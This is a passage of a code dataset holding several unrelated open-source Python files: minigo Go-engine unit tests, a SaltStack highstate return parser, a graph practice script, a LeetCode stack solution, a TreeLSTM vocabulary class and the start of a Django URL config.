\"\"\n if vacancy['salary'].get('to') is None:\n vacancy[\"salary\"][\"to\"] = \"\"\n if vacancy['snippet'].get('responsibility') is None:\n vacancy['snippet'][\"responsibility\"] = \"\"\n\n print(f' Vacancy name: {vacancy[\"name\"]}\\n'\n f' Description: {vacancy[\"snippet\"][\"responsibility\"]}\\n'\n f' City: {vacancy[\"area\"][\"name\"]}\\n'\n f' Salary from: {vacancy[\"salary\"][\"from\"]} to {vacancy[\"salary\"][\"to\"]}\\n')\n except TypeError:\n return None\n","repo_name":"MihailBashkatov/Course_work_5","sub_path":"utils/utils_api.py","file_name":"utils_api.py","file_ext":"py","file_size_in_byte":3011,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"35566410013","text":"import numpy as np\n\nimport coords\nfrom go import Position, PlayerMove, LibertyTracker, WHITE, BLACK\nimport go\nimport sgf_wrapper\nfrom tests import test_utils\n\nEMPTY_ROW = '.' * go.N + '\\n'\nTEST_BOARD = test_utils.load_board('''\n.X.....OO\nX........\n''' + EMPTY_ROW * 7)\n\nNO_HANDICAP_SGF = \"(;CA[UTF-8]SZ[9]PB[Murakawa Daisuke]PW[Iyama Yuta]KM[6.5]HA[0]RE[W+1.5]GM[1];B[fd];W[cf];B[eg];W[dd];B[dc];W[cc];B[de];W[cd];B[ed];W[he];B[ce];W[be];B[df];W[bf];B[hd];W[ge];B[gd];W[gg];B[db];W[cb];B[cg];W[bg];B[gh];W[fh];B[hh];W[fg];B[eh];W[ei];B[di];W[fi];B[hg];W[dh];B[ch];W[ci];B[bh];W[ff];B[fe];W[hf];B[id];W[bi];B[ah];W[ef];B[dg];W[ee];B[di];W[ig];B[ai];W[ih];B[fb];W[hi];B[ag];W[ab];B[bd];W[bc];B[ae];W[ad];B[af];W[bd];B[ca];W[ba];B[da];W[ie])\"\n\n\ndef coords_from_gtp_set(string):\n return frozenset(map(coords.from_gtp, string.split()))\n\n\nclass TestBasicFunctions(test_utils.MinigoUnitTest):\n def test_load_board(self):\n self.assertEqualNPArray(go.EMPTY_BOARD, np.zeros([go.N, go.N]))\n self.assertEqualNPArray(\n go.EMPTY_BOARD, test_utils.load_board('. 
\\n' * go.N ** 2))\n\n def test_neighbors(self):\n corner = coords.from_gtp('A1')\n neighbors = [go.EMPTY_BOARD[c] for c in go.NEIGHBORS[corner]]\n self.assertEqual(len(neighbors), 2)\n\n side = coords.from_gtp('A2')\n side_neighbors = [go.EMPTY_BOARD[c] for c in go.NEIGHBORS[side]]\n self.assertEqual(len(side_neighbors), 3)\n\n def test_is_koish(self):\n self.assertEqual(go.is_koish(\n TEST_BOARD, coords.from_gtp('A9')), BLACK)\n self.assertEqual(go.is_koish(TEST_BOARD, coords.from_gtp('B8')), None)\n self.assertEqual(go.is_koish(TEST_BOARD, coords.from_gtp('B9')), None)\n self.assertEqual(go.is_koish(TEST_BOARD, coords.from_gtp('E5')), None)\n\n def test_is_eyeish(self):\n board = test_utils.load_board('''\n .XX...XXX\n X.X...X.X\n XX.....X.\n ........X\n XXXX.....\n OOOX....O\n X.OXX.OO.\n .XO.X.O.O\n XXO.X.OO.\n ''')\n B_eyes = coords_from_gtp_set('A2 A9 B8 J7 H8')\n W_eyes = coords_from_gtp_set('H2 J1 J3')\n not_eyes = coords_from_gtp_set('B3 E5')\n for be in B_eyes:\n self.assertEqual(go.is_eyeish(board, be), BLACK, str(be))\n for we in W_eyes:\n self.assertEqual(go.is_eyeish(board, we), WHITE, str(we))\n for ne in not_eyes:\n self.assertEqual(go.is_eyeish(board, ne), None, str(ne))\n\n\nclass TestLibertyTracker(test_utils.MinigoUnitTest):\n def test_lib_tracker_init(self):\n board = test_utils.load_board('X........' + EMPTY_ROW * 8)\n\n lib_tracker = LibertyTracker.from_board(board)\n self.assertEqual(len(lib_tracker.groups), 1)\n self.assertNotEqual(\n lib_tracker.group_index[coords.from_gtp('A9')], go.MISSING_GROUP_ID)\n self.assertEqual(lib_tracker.liberty_cache[coords.from_gtp('A9')], 2)\n sole_group = lib_tracker.groups[lib_tracker.group_index[coords.from_gtp(\n 'A9')]]\n self.assertEqual(sole_group.stones, coords_from_gtp_set('A9'))\n self.assertEqual(sole_group.liberties, coords_from_gtp_set('B9 A8'))\n self.assertEqual(sole_group.color, BLACK)\n\n def test_place_stone(self):\n board = test_utils.load_board('X........' + EMPTY_ROW * 8)\n lib_tracker = LibertyTracker.from_board(board)\n lib_tracker.add_stone(BLACK, coords.from_gtp('B9'))\n self.assertEqual(len(lib_tracker.groups), 1)\n self.assertNotEqual(\n lib_tracker.group_index[coords.from_gtp('A9')], go.MISSING_GROUP_ID)\n self.assertEqual(lib_tracker.liberty_cache[coords.from_gtp('A9')], 3)\n self.assertEqual(lib_tracker.liberty_cache[coords.from_gtp('B9')], 3)\n sole_group = lib_tracker.groups[lib_tracker.group_index[coords.from_gtp(\n 'A9')]]\n self.assertEqual(sole_group.stones, coords_from_gtp_set('A9 B9'))\n self.assertEqual(sole_group.liberties,\n coords_from_gtp_set('C9 A8 B8'))\n self.assertEqual(sole_group.color, BLACK)\n\n def test_place_stone_opposite_color(self):\n board = test_utils.load_board('X........' 
+ EMPTY_ROW * 8)\n lib_tracker = LibertyTracker.from_board(board)\n lib_tracker.add_stone(WHITE, coords.from_gtp('B9'))\n self.assertEqual(len(lib_tracker.groups), 2)\n self.assertNotEqual(\n lib_tracker.group_index[coords.from_gtp('A9')], go.MISSING_GROUP_ID)\n self.assertNotEqual(\n lib_tracker.group_index[coords.from_gtp('B9')], go.MISSING_GROUP_ID)\n self.assertEqual(lib_tracker.liberty_cache[coords.from_gtp('A9')], 1)\n self.assertEqual(lib_tracker.liberty_cache[coords.from_gtp('B9')], 2)\n black_group = lib_tracker.groups[lib_tracker.group_index[coords.from_gtp(\n 'A9')]]\n white_group = lib_tracker.groups[lib_tracker.group_index[coords.from_gtp(\n 'B9')]]\n self.assertEqual(black_group.stones, coords_from_gtp_set('A9'))\n self.assertEqual(black_group.liberties, coords_from_gtp_set('A8'))\n self.assertEqual(black_group.color, BLACK)\n self.assertEqual(white_group.stones, coords_from_gtp_set('B9'))\n self.assertEqual(white_group.liberties, coords_from_gtp_set('C9 B8'))\n self.assertEqual(white_group.color, WHITE)\n\n def test_merge_multiple_groups(self):\n board = test_utils.load_board('''\n .X.......\n X.X......\n .X.......\n ''' + EMPTY_ROW * 6)\n lib_tracker = LibertyTracker.from_board(board)\n lib_tracker.add_stone(BLACK, coords.from_gtp('B8'))\n self.assertEqual(len(lib_tracker.groups), 1)\n self.assertNotEqual(\n lib_tracker.group_index[coords.from_gtp('B8')], go.MISSING_GROUP_ID)\n sole_group = lib_tracker.groups[lib_tracker.group_index[coords.from_gtp(\n 'B8')]]\n self.assertEqual(sole_group.stones,\n coords_from_gtp_set('B9 A8 B8 C8 B7'))\n self.assertEqual(sole_group.liberties,\n coords_from_gtp_set('A9 C9 D8 A7 C7 B6'))\n self.assertEqual(sole_group.color, BLACK)\n\n liberty_cache = lib_tracker.liberty_cache\n for stone in sole_group.stones:\n self.assertEqual(liberty_cache[stone], 6, str(stone))\n\n def test_capture_stone(self):\n board = test_utils.load_board('''\n .X.......\n XO.......\n .X.......\n ''' + EMPTY_ROW * 6)\n lib_tracker = LibertyTracker.from_board(board)\n captured = lib_tracker.add_stone(BLACK, coords.from_gtp('C8'))\n self.assertEqual(len(lib_tracker.groups), 4)\n self.assertEqual(\n lib_tracker.group_index[coords.from_gtp('B8')], go.MISSING_GROUP_ID)\n self.assertEqual(captured, coords_from_gtp_set('B8'))\n\n def test_capture_many(self):\n board = test_utils.load_board('''\n .XX......\n XOO......\n .XX......\n ''' + EMPTY_ROW * 6)\n lib_tracker = LibertyTracker.from_board(board)\n captured = lib_tracker.add_stone(BLACK, coords.from_gtp('D8'))\n self.assertEqual(len(lib_tracker.groups), 4)\n self.assertEqual(\n lib_tracker.group_index[coords.from_gtp('B8')], go.MISSING_GROUP_ID)\n self.assertEqual(captured, coords_from_gtp_set('B8 C8'))\n\n left_group = lib_tracker.groups[lib_tracker.group_index[coords.from_gtp(\n 'A8')]]\n self.assertEqual(left_group.stones, coords_from_gtp_set('A8'))\n self.assertEqual(left_group.liberties,\n coords_from_gtp_set('A9 B8 A7'))\n\n right_group = lib_tracker.groups[lib_tracker.group_index[coords.from_gtp(\n 'D8')]]\n self.assertEqual(right_group.stones, coords_from_gtp_set('D8'))\n self.assertEqual(right_group.liberties,\n coords_from_gtp_set('D9 C8 E8 D7'))\n\n top_group = lib_tracker.groups[lib_tracker.group_index[coords.from_gtp(\n 'B9')]]\n self.assertEqual(top_group.stones, coords_from_gtp_set('B9 C9'))\n self.assertEqual(top_group.liberties,\n coords_from_gtp_set('A9 D9 B8 C8'))\n\n bottom_group = lib_tracker.groups[lib_tracker.group_index[coords.from_gtp(\n 'B7')]]\n self.assertEqual(bottom_group.stones, 
coords_from_gtp_set('B7 C7'))\n self.assertEqual(bottom_group.liberties,\n coords_from_gtp_set('B8 C8 A7 D7 B6 C6'))\n\n liberty_cache = lib_tracker.liberty_cache\n for stone in top_group.stones:\n self.assertEqual(liberty_cache[stone], 4, str(stone))\n for stone in left_group.stones:\n self.assertEqual(liberty_cache[stone], 3, str(stone))\n for stone in right_group.stones:\n self.assertEqual(liberty_cache[stone], 4, str(stone))\n for stone in bottom_group.stones:\n self.assertEqual(liberty_cache[stone], 6, str(stone))\n for stone in captured:\n self.assertEqual(liberty_cache[stone], 0, str(stone))\n\n def test_capture_multiple_groups(self):\n board = test_utils.load_board('''\n .OX......\n OXX......\n XX.......\n ''' + EMPTY_ROW * 6)\n lib_tracker = LibertyTracker.from_board(board)\n captured = lib_tracker.add_stone(BLACK, coords.from_gtp('A9'))\n self.assertEqual(len(lib_tracker.groups), 2)\n self.assertEqual(captured, coords_from_gtp_set('B9 A8'))\n\n corner_stone = lib_tracker.groups[lib_tracker.group_index[coords.from_gtp(\n 'A9')]]\n self.assertEqual(corner_stone.stones, coords_from_gtp_set('A9'))\n self.assertEqual(corner_stone.liberties, coords_from_gtp_set('B9 A8'))\n\n surrounding_stones = lib_tracker.groups[lib_tracker.group_index[coords.from_gtp(\n 'C9')]]\n self.assertEqual(surrounding_stones.stones,\n coords_from_gtp_set('C9 B8 C8 A7 B7'))\n self.assertEqual(surrounding_stones.liberties,\n coords_from_gtp_set('B9 D9 A8 D8 C7 A6 B6'))\n\n liberty_cache = lib_tracker.liberty_cache\n for stone in corner_stone.stones:\n self.assertEqual(liberty_cache[stone], 2, str(stone))\n for stone in surrounding_stones.stones:\n self.assertEqual(liberty_cache[stone], 7, str(stone))\n\n def test_same_friendly_group_neighboring_twice(self):\n board = test_utils.load_board('''\n XX.......\n X........\n ''' + EMPTY_ROW * 7)\n\n lib_tracker = LibertyTracker.from_board(board)\n captured = lib_tracker.add_stone(BLACK, coords.from_gtp('B8'))\n self.assertEqual(len(lib_tracker.groups), 1)\n sole_group_id = lib_tracker.group_index[coords.from_gtp('A9')]\n sole_group = lib_tracker.groups[sole_group_id]\n self.assertEqual(sole_group.stones,\n coords_from_gtp_set('A9 B9 A8 B8'))\n self.assertEqual(sole_group.liberties,\n coords_from_gtp_set('C9 C8 A7 B7'))\n self.assertEqual(captured, set())\n\n def test_same_opponent_group_neighboring_twice(self):\n board = test_utils.load_board('''\n XX.......\n X........\n ''' + EMPTY_ROW * 7)\n\n lib_tracker = LibertyTracker.from_board(board)\n captured = lib_tracker.add_stone(WHITE, coords.from_gtp('B8'))\n self.assertEqual(len(lib_tracker.groups), 2)\n black_group = lib_tracker.groups[lib_tracker.group_index[coords.from_gtp(\n 'A9')]]\n self.assertEqual(black_group.stones, coords_from_gtp_set('A9 B9 A8'))\n self.assertEqual(black_group.liberties, coords_from_gtp_set('C9 A7'))\n\n white_group = lib_tracker.groups[lib_tracker.group_index[coords.from_gtp(\n 'B8')]]\n self.assertEqual(white_group.stones, coords_from_gtp_set('B8'))\n self.assertEqual(white_group.liberties, coords_from_gtp_set('C8 B7'))\n\n self.assertEqual(captured, set())\n\n\nclass TestPosition(test_utils.MinigoUnitTest):\n def test_passing(self):\n start_position = Position(\n board=TEST_BOARD,\n n=0,\n komi=6.5,\n caps=(1, 2),\n ko=coords.from_gtp('A1'),\n recent=tuple(),\n to_play=BLACK,\n )\n expected_position = Position(\n board=TEST_BOARD,\n n=1,\n komi=6.5,\n caps=(1, 2),\n ko=None,\n recent=(PlayerMove(BLACK, None),),\n to_play=WHITE,\n )\n pass_position = start_position.pass_move()\n 
self.assertEqualPositions(pass_position, expected_position)\n\n def test_flipturn(self):\n start_position = Position(\n board=TEST_BOARD,\n n=0,\n komi=6.5,\n caps=(1, 2),\n ko=coords.from_gtp('A1'),\n recent=tuple(),\n to_play=BLACK,\n )\n expected_position = Position(\n board=TEST_BOARD,\n n=0,\n komi=6.5,\n caps=(1, 2),\n ko=None,\n recent=tuple(),\n to_play=WHITE,\n )\n flip_position = start_position.flip_playerturn()\n self.assertEqualPositions(flip_position, expected_position)\n\n def test_is_move_suicidal(self):\n board = test_utils.load_board('''\n ...O.O...\n ....O....\n XO.....O.\n OXO...OXO\n O.XO.OX.O\n OXO...OOX\n XO.......\n ......XXO\n .....XOO.\n ''')\n position = Position(\n board=board,\n to_play=BLACK,\n )\n suicidal_moves = coords_from_gtp_set('E9 H5')\n nonsuicidal_moves = coords_from_gtp_set('B5 J1 A9')\n for move in suicidal_moves:\n # sanity check my coordinate input\n self.assertEqual(position.board[move], go.EMPTY)\n self.assertTrue(position.is_move_suicidal(move), str(move))\n for move in nonsuicidal_moves:\n # sanity check my coordinate input\n self.assertEqual(position.board[move], go.EMPTY)\n self.assertFalse(position.is_move_suicidal(move), str(move))\n\n def test_legal_moves(self):\n board = test_utils.load_board('''\n .O.O.XOX.\n O..OOOOOX\n ......O.O\n OO.....OX\n XO.....X.\n .O.......\n OX.....OO\n XX...OOOX\n .....O.X.\n ''')\n position = Position(board=board, to_play=BLACK)\n illegal_moves = coords_from_gtp_set('A9 E9 J9')\n legal_moves = coords_from_gtp_set('A4 G1 J1 H7') | {None}\n for move in illegal_moves:\n with self.subTest(type='illegal', move=move):\n self.assertFalse(position.is_move_legal(move))\n for move in legal_moves:\n with self.subTest(type='legal', move=move):\n self.assertTrue(position.is_move_legal(move))\n # check that the bulk legal test agrees with move-by-move illegal test.\n bulk_legality = position.all_legal_moves()\n for i, bulk_legal in enumerate(bulk_legality):\n with self.subTest(type='bulk', move=coords.from_flat(i)):\n self.assertEqual(\n bulk_legal, position.is_move_legal(coords.from_flat(i)))\n\n # flip the colors and check that everything is still (il)legal\n position = Position(board=-board, to_play=WHITE)\n for move in illegal_moves:\n with self.subTest(type='illegal', move=move):\n self.assertFalse(position.is_move_legal(move))\n for move in legal_moves:\n with self.subTest(type='legal', move=move):\n self.assertTrue(position.is_move_legal(move))\n bulk_legality = position.all_legal_moves()\n for i, bulk_legal in enumerate(bulk_legality):\n with self.subTest(type='bulk', move=coords.from_flat(i)):\n self.assertEqual(\n bulk_legal, position.is_move_legal(coords.from_flat(i)))\n\n def test_move(self):\n start_position = Position(\n board=TEST_BOARD,\n n=0,\n komi=6.5,\n caps=(1, 2),\n ko=None,\n recent=tuple(),\n to_play=BLACK,\n )\n expected_board = test_utils.load_board('''\n .XX....OO\n X........\n ''' + EMPTY_ROW * 7)\n expected_position = Position(\n board=expected_board,\n n=1,\n komi=6.5,\n caps=(1, 2),\n ko=None,\n recent=(PlayerMove(BLACK, coords.from_gtp('C9')),),\n to_play=WHITE,\n )\n actual_position = start_position.play_move(coords.from_gtp('C9'))\n self.assertEqualPositions(actual_position, expected_position)\n\n expected_board2 = test_utils.load_board('''\n .XX....OO\n X.......O\n ''' + EMPTY_ROW * 7)\n expected_position2 = Position(\n board=expected_board2,\n n=2,\n komi=6.5,\n caps=(1, 2),\n ko=None,\n recent=(PlayerMove(BLACK, coords.from_gtp('C9')),\n PlayerMove(WHITE, coords.from_gtp('J8'))),\n 
to_play=BLACK,\n )\n actual_position2 = actual_position.play_move(coords.from_gtp('J8'))\n self.assertEqualPositions(actual_position2, expected_position2)\n\n def test_move_with_capture(self):\n start_board = test_utils.load_board(EMPTY_ROW * 5 + '''\n XXXX.....\n XOOX.....\n O.OX.....\n OOXX.....\n ''')\n start_position = Position(\n board=start_board,\n n=0,\n komi=6.5,\n caps=(1, 2),\n ko=None,\n recent=tuple(),\n to_play=BLACK,\n )\n expected_board = test_utils.load_board(EMPTY_ROW * 5 + '''\n XXXX.....\n X..X.....\n .X.X.....\n ..XX.....\n ''')\n expected_position = Position(\n board=expected_board,\n n=1,\n komi=6.5,\n caps=(7, 2),\n ko=None,\n recent=(PlayerMove(BLACK, coords.from_gtp('B2')),),\n to_play=WHITE,\n )\n actual_position = start_position.play_move(coords.from_gtp('B2'))\n self.assertEqualPositions(actual_position, expected_position)\n\n def test_ko_move(self):\n start_board = test_utils.load_board('''\n .OX......\n OX.......\n ''' + EMPTY_ROW * 7)\n start_position = Position(\n board=start_board,\n n=0,\n komi=6.5,\n caps=(1, 2),\n ko=None,\n recent=tuple(),\n to_play=BLACK,\n )\n expected_board = test_utils.load_board('''\n X.X......\n OX.......\n ''' + EMPTY_ROW * 7)\n expected_position = Position(\n board=expected_board,\n n=1,\n komi=6.5,\n caps=(2, 2),\n ko=coords.from_gtp('B9'),\n recent=(PlayerMove(BLACK, coords.from_gtp('A9')),),\n to_play=WHITE,\n )\n actual_position = start_position.play_move(coords.from_gtp('A9'))\n\n self.assertEqualPositions(actual_position, expected_position)\n\n # Check that retaking ko is illegal until two intervening moves\n with self.assertRaises(go.IllegalMove):\n actual_position.play_move(coords.from_gtp('B9'))\n pass_twice = actual_position.pass_move().pass_move()\n ko_delayed_retake = pass_twice.play_move(coords.from_gtp('B9'))\n expected_position = Position(\n board=start_board,\n n=4,\n komi=6.5,\n caps=(2, 3),\n ko=coords.from_gtp('A9'),\n recent=(\n PlayerMove(BLACK, coords.from_gtp('A9')),\n PlayerMove(WHITE, None),\n PlayerMove(BLACK, None),\n PlayerMove(WHITE, coords.from_gtp('B9'))),\n to_play=BLACK,\n )\n self.assertEqualPositions(ko_delayed_retake, expected_position)\n\n def test_is_game_over(self):\n root = go.Position()\n self.assertFalse(root.is_game_over())\n first_pass = root.play_move(None)\n self.assertFalse(first_pass.is_game_over())\n second_pass = first_pass.play_move(None)\n self.assertTrue(second_pass.is_game_over())\n\n def test_scoring(self):\n board = test_utils.load_board('''\n .XX......\n OOXX.....\n OOOX...X.\n OXX......\n OOXXXXXX.\n OOOXOXOXX\n .O.OOXOOX\n .O.O.OOXX\n ......OOO\n ''')\n position = Position(\n board=board,\n n=54,\n komi=6.5,\n caps=(2, 5),\n ko=None,\n recent=tuple(),\n to_play=BLACK,\n )\n expected_score = 1.5\n self.assertEqual(position.score(), expected_score)\n\n board = test_utils.load_board('''\n XXX......\n OOXX.....\n OOOX...X.\n OXX......\n OOXXXXXX.\n OOOXOXOXX\n .O.OOXOOX\n .O.O.OOXX\n ......OOO\n ''')\n position = Position(\n board=board,\n n=55,\n komi=6.5,\n caps=(2, 5),\n ko=None,\n recent=tuple(),\n to_play=WHITE,\n )\n expected_score = 2.5\n self.assertEqual(position.score(), expected_score)\n\n def test_replay_position(self):\n sgf_positions = list(sgf_wrapper.replay_sgf(NO_HANDICAP_SGF))\n initial = sgf_positions[0]\n self.assertEqual(initial.result, go.WHITE)\n\n final = sgf_positions[-1].position.play_move(\n sgf_positions[-1].next_move)\n\n # sanity check to ensure we're working with the right position\n final_board = test_utils.load_board('''\n .OXX.....\n 
O.OX.X...\n .OOX.....\n OOOOXXXXX\n XOXXOXOOO\n XOOXOO.O.\n XOXXXOOXO\n XXX.XOXXO\n X..XOO.O.\n ''')\n expected_final_position = go.Position(\n final_board,\n n=62,\n komi=6.5,\n caps=(3, 2),\n ko=None,\n recent=tuple(),\n to_play=go.BLACK\n )\n self.assertEqualPositions(expected_final_position, final)\n self.assertEqual(final.n, len(final.recent))\n\n replayed_positions = list(go.replay_position(final, 1))\n for sgf_pos, replay_pos in zip(sgf_positions, replayed_positions):\n self.assertEqualPositions(sgf_pos.position, replay_pos.position)\n","repo_name":"tensorflow/minigo","sub_path":"tests/test_go.py","file_name":"test_go.py","file_ext":"py","file_size_in_byte":22925,"program_lang":"python","lang":"en","doc_type":"code","stars":3409,"dataset":"github-code","pt":"77"} +{"seq_id":"10561813533","text":"#!/usr/bin/env python\n\nimport re\nimport logging\nimport json\nfrom time import sleep\nfrom ast import literal_eval\n\n\nclass SaltReturnParser:\n\n log = logging.getLogger('saltnanny')\n fun_running_pattern = 'is running as PID'\n\n def __init__(self, cache_client, min_interval=15, max_attempts=15):\n self.cache_client = cache_client\n self.min_interval = min_interval\n self.max_attempts = max_attempts\n\n def process_jids(self, completed_minions, all_minions_count):\n return_code_sum = 0\n for minion, jid in completed_minions.iteritems():\n try:\n return_info, return_code = self.get_return_info(minion, jid)\n return_code_sum += return_code\n self.log.info(json.dumps(return_info, indent=1))\n except ValueError as ve:\n self.log.error('Error retrieving results for Minion:{0}: Exception:{1}'.format(minion, ve))\n\n if not completed_minions:\n self.log.info('No highstates found in Job Cache.')\n return 2\n\n if len(completed_minions) != all_minions_count and return_code_sum == 0:\n self.log.info('Highstates available in Job Cache were successful, timed out waiting for others.')\n return_code_sum = 1\n elif return_code_sum != 0:\n self.log.info('One or more highstates were not entirely successful. Please investigate.')\n else:\n self.log.info('All Highstates completed successfully!')\n\n return return_code_sum\n\n def check_custom_event_failure(self, cache_key, failures, successes):\n custom_results = literal_eval(self.cache_client.get_value_by_key(cache_key))\n self.log.info('Custom Event Return in Job Cache. 
Key: {0} Value:'.format(cache_key))\n if isinstance(custom_results, list):\n # Print results on each line if its a list (for example a list of log statements)\n for result in custom_results:\n self.log.info(result)\n\n for result in custom_results:\n if self.check_successes(result, successes):\n return 0\n if self.check_failures(result, failures):\n return 1\n else:\n self.log.info(custom_results)\n if self.check_successes(custom_results, successes):\n return 0\n if self.check_failures(custom_results, failures):\n return 1\n return 0\n\n @staticmethod\n def check_failures(result, failures):\n failures_exist = [True for failure in failures if failure in result]\n return True in failures_exist\n\n @staticmethod\n def check_successes(result, successes):\n successes_exist = [True for success in successes if success in result]\n return True in successes_exist\n\n def get_return_info(self, minion, jid, attempt=1):\n self.log.info('Getting return info for Minion:{0} JID:{1}'.format(minion, jid))\n\n return_info = self.cache_client.get_return_by_jid(minion, jid)\n return_dict = json.loads(return_info)\n return_code = return_dict.get('retcode')\n\n if self.is_fun_running(return_dict) and attempt < self.max_attempts:\n self.log.info('Return Info for JID:{0} indicates that the function is still running.'.format(jid))\n self.log.info('Sleeping for {0} seconds...'\n .format(self.min_interval, jid))\n sleep(self.min_interval)\n attempt += 1\n return self.get_return_info(minion, jid, attempt)\n\n if self.highstate_failed(return_info) or not isinstance(return_code, int):\n return_code = 1\n\n return return_dict, return_code\n\n def highstate_failed(self, result):\n try:\n possible_failures = [\n '\"result\": false',\n 'Data failed to compile:',\n 'Pillar failed to render with the following messages:',\n 'Detected conflicting IDs',\n 'Cannot extend ID',\n 'not available on the salt master or through a configured fileserver'\n ]\n failures = [failure in result for failure in possible_failures]\n self.log.info(failures)\n if True not in failures:\n failures = self.check_regex_failure(failures, result)\n return True in failures\n except:\n self.log.error('Error finding if there was a failure in the result:\\n {0}'.format(result))\n return True\n\n def check_regex_failure(self, failures, result):\n regex_failure = r\"Rendering SLS '.*' failed:\"\n failures.append(bool(re.search(regex_failure, result)))\n return failures\n\n def is_fun_running(self, return_dict):\n if 'return' in return_dict and isinstance(return_dict['return'], list):\n for return_item in return_dict['return']:\n if self.fun_running_pattern in return_item:\n return True\n return False\n","repo_name":"dandb/salt-nanny","sub_path":"saltnanny/salt_return_parser.py","file_name":"salt_return_parser.py","file_ext":"py","file_size_in_byte":5012,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"77"} +{"seq_id":"5333556498","text":"from Node import *\n\ndef create_graph():\n matrix = [[1,1,4],[2,2,5],[3,3,6]]\n grph = Graph(len(matrix), len(matrix[0]))\n\n for i in range (len(matrix)):\n for j in range (len(matrix[0])):\n grph.add_node((i,j))\n\n\n\n for i in range (len(matrix)):\n for j in range (len(matrix[0])):\n # try for all four neighbors in order: right, bottom, left, top\n # note here the order in which the neighbors are stored is imp\n if j + 1 < len(matrix[0]):\n grph.add_edge((i,j),(i,j+1),matrix[i][j])\n if i + 1 < len(matrix):\n grph.add_edge((i,j),(i+1,j),matrix[i][j])\n if j -1 >= 0:\n 
grph.add_edge((i,j),(i,j-1),matrix[i][j])\n            if i -1 >=0:\n                grph.add_edge((i,j),(i-1,j),matrix[i][j])\n\n    # for keys in grph.vert_list.keys():\n    #     print(grph.vert_list[keys])\n    #\n    # for keys in grph.vert_list.keys():\n    #     print(grph.vert_list[keys].list_nbrs)\n\n    dual = grph.get_dual()\n\n    for id,node in dual.vert_list.items():\n        print(\"**\", id ,\" \" ,node)\n\n    print(grph.find_faces(grph.vert_list))\n\n\n\ndef tp():\n    v = {}\n\n    for i in range(5):\n        v[i] = i**3\n\n    for i in v.keys():\n        print(i)\n\n\nif __name__ == '__main__':\n    create_graph()\n    # tp()","repo_name":"ktjosh/Capstone","sub_path":"Practise.py","file_name":"Practise.py","file_ext":"py","file_size_in_byte":1314,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"27435734369","text":"# ************************************************\n# username   : smmehrab\n# fullname   : s.m.mehrabul islam\n# email      : mehrab.24csedu.001@gmail.com\n# institute  : university of dhaka, bangladesh\n# session    : 2017-2018\n# ************************************************\n\nclass Node:\n\tdef __init__(self, value):\n\t\tself.value = value\n\t\tself.next = None\n\nclass Stack:\n\n\tdef __init__(self):\n\t\tself.head = Node(\"head\")\n\t\tself.size = 0\n\n\tdef __str__(self):\n\t\tnode = self.head.next\n\t\tresult = \"\"\n\t\twhile node:\n\t\t\tresult += str(node.value) + \"->\"\n\t\t\tnode = node.next\n\t\treturn result[:-3]\n\n\tdef getSize(self):\n\t\treturn self.size\n\n\tdef isEmpty(self):\n\t\treturn self.size == 0\n\n\tdef peek(self):\n\t\tif self.isEmpty():\n\t\t\traise Exception(\"Can't Peek from Empty Stack\")\n\t\treturn self.head.next.value\n\n\tdef push(self, value):\n\t\tnode = Node(value)\n\t\tnode.next = self.head.next\n\t\tself.head.next = node\n\t\tself.size += 1\n\n\tdef pop(self):\n\t\tif self.isEmpty():\n\t\t\traise Exception(\"Can't Pop from Empty Stack\")\n\t\tnode = self.head.next\n\t\tself.head.next = self.head.next.next\n\t\tself.size -= 1\n\t\treturn node.value\n\nclass Solution(object):\n    def dailyTemperatures(self, temperatures):\n        \"\"\"\n        :type temperatures: List[int]\n        :rtype: List[int]\n        \"\"\"\n        \n        n = len(temperatures)\n        answers = [0]*n\n        stack = Stack()\n        for index, temperature in enumerate(temperatures):\n            while not stack.isEmpty() and temperature>temperatures[stack.peek()]:\n                left = stack.peek()\n                answers[left] = index-left\n                stack.pop()\n            stack.push(index)\n        return answers\n","repo_name":"smmehrab/problem-solving","sub_path":"codes/leetcode/DailyTemperatures.py","file_name":"DailyTemperatures.py","file_ext":"py","file_size_in_byte":1656,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"13489426612","text":"import unicodedata\nimport treelstm.constants as cstword\n# ------------------------------------------------------------------------------\n# Dictionary class for tokens.\n# ------------------------------------------------------------------------------\nclass Dictionary(object):\n    '''\n    Dictionary used to load the vocabulary.\n    Special-symbol indices:\n    PAD = 0\n    UNK = 1\n    BOS = 2\n    EOS = 3\n    '''\n    @staticmethod\n    def normalize(token):\n        return unicodedata.normalize('NFD', token)\n\n    def __init__(self):\n        # token (str) -> index (int)\n        self.tok2ind = {cstword.PAD_WORD: cstword.PAD,\n                        cstword.UNK_WORD: cstword.UNK,\n                        cstword.BOS_WORD: cstword.BOS,\n                        cstword.EOS_WORD: cstword.EOS}\n        # index (int) -> token (str)\n        self.ind2tok = {cstword.PAD: cstword.PAD_WORD,\n                        cstword.UNK: cstword.UNK_WORD,\n                        cstword.BOS: cstword.BOS_WORD,\n                        cstword.EOS: cstword.EOS_WORD}\n\n    def __len__(self):\n        return len(self.tok2ind)\n\n    
def __iter__(self):\n return iter(self.tok2ind)\n\n def __contains__(self, key):\n if type(key) == int:\n return key in self.ind2tok\n elif type(key) == str:\n return self.normalize(key) in self.tok2ind\n\n def __getitem__(self, key):\n if type(key) == int:\n return self.ind2tok.get(key, cstword.UNK_WORD)\n if type(key) == str:\n return self.tok2ind.get(self.normalize(key),\n self.tok2ind.get(cstword.UNK_WORD))\n\n def __setitem__(self, key, item):\n if type(key) == int and type(item) == str:\n self.ind2tok[key] = item\n elif type(key) == str and type(item) == int:\n self.tok2ind[key] = item\n else:\n raise RuntimeError('Invalid (key, item) types.')\n\n def add(self, token):\n token = self.normalize(token)\n if token not in self.tok2ind:\n index = len(self.tok2ind)\n self.tok2ind[token] = index\n self.ind2tok[index] = token\n\n def tokens(self):\n \"\"\"Get dictionary tokens.\n\n Return all the words indexed by this dictionary, except for special\n tokens.\n \"\"\"\n constdict = {cstword.PAD_WORD,cstword.EOS_WORD,cstword.BOS_WORD,cstword.UNK_WORD}\n tokens = [k for k in self.tok2ind.keys()\n if k not in constdict]\n return tokens","repo_name":"MobtgZhang/TextSimilarity","sub_path":"treelstm/dictionary.py","file_name":"dictionary.py","file_ext":"py","file_size_in_byte":2400,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"75110152569","text":"\"\"\"\nURL configuration for liberty_test_task project.\n\nThe 